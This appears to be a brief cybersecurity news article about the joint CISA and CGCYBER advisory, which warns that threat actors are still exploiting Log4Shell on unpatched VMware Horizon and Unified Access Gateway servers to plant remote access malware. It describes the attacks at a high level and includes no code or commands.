Six months after fixing, hackers are still exploiting the infamous Log4Shell vulnerability to attack VMware Horizon and Unified Access Gateway servers to get the initial access to a victims’ networks.

According to a recent joint advisory published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Coast Guard Cyber Command (CGCYBER), since December 2021, multiple threat actor groups, including the state-sponsored ones, have been exploiting Log4Shell on unpatched, public-facing VMware Horizon and Unified Access Gateway servers. In these attacks threat actors were observed planting malware on compromised systems with embedded executables enabling remote command-and-control.

The Log4Shell vulnerability (CVE-2021-44228) is a remote code execution flaw in a widely used Apache Log4j logging utility. Using this bug, a threat actor can send a specially-crafted command to an affected system, execute a malicious code, and get the control over the victim’s machine.

According to the joint advisory, the hackers use Log4Shell to deliver malicious payloads, including PowerShell scripts and hmsvc.exe, a remote access tool for keylogging and deploying additional malware.

The Log4Shell vulnerability was identified in November 2021 and patched a month later, three days before it was publicly disclosed. But an ongoing Log4Shell-related malicious campaign suggests that there are still a lot of unpatched servers, and the vulnerability is a very valuable asset for hackers, especially advanced persistent threat groups.